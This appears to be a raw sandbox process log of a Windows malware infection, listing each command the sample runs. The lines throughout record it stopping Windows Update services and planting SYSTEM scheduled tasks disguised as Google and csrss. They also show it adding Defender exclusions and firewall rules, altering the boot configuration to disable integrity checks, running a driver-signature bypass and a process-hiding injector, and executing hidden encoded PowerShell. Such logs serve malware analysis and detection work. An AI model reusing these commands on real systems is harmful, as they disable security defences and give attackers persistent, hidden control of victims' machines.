sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "13008904181964767807662118810-428265889517071880-2020988188412013543288926030"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 256

C:\Windows\system32\taskeng.exe

taskeng.exe {66C153DA-770C-4BB7-9622-CFD0A633B0CA} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-78500428110879462821043918584-16332063011247176534-488973184153540854939602413"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gvVZWiGbX"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe\" 3Y /ySsite_idvCF 385119 /S" /V1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\rVzNwXv.exe 3Y /ySsite_idvCF 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gCWbUYlmG" /SC once /ST 03:36:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gCWbUYlmG"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gCWbUYlmG"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\EVRgLGGm\UrPUMbOuZHCAMWty.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\EVRgLGGm\UrPUMbOuZHCAMWty.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-3790916255396814731752578957-188501265831078644366430744-108823945-786410078"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-69814339106381364617213098141770660542-1139889688-955403495412069342-60979916"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-225896277-1620581861153161077930711556867343533-672588651869888435226540335"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:20:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe\" KS /Ihsite_idqog 385119 /S" /V1 /F

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe KS /Ihsite_idqog 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "306653802-3696107681876766882-1013432570646760435-1929361707-1112501539-910770329"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1218596053-205595897516274006503731996851374196738-1323794956-2045786015-1041118325"

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\jtxeRE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\ipYlZgZ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\zTVzRhL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\gJVdIcA.xml" /RU "SYSTEM"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PksooSV.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\UPAWKJU.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 03:24:53 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\GWQjbQrk\qubcDRl.dll\",#1 /PCsite_idNyu 385119" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GWQjbQrk\qubcDRl.dll",#1 /PCsite_idNyu 385119

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GWQjbQrk\qubcDRl.dll",#1 /PCsite_idNyu 385119

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

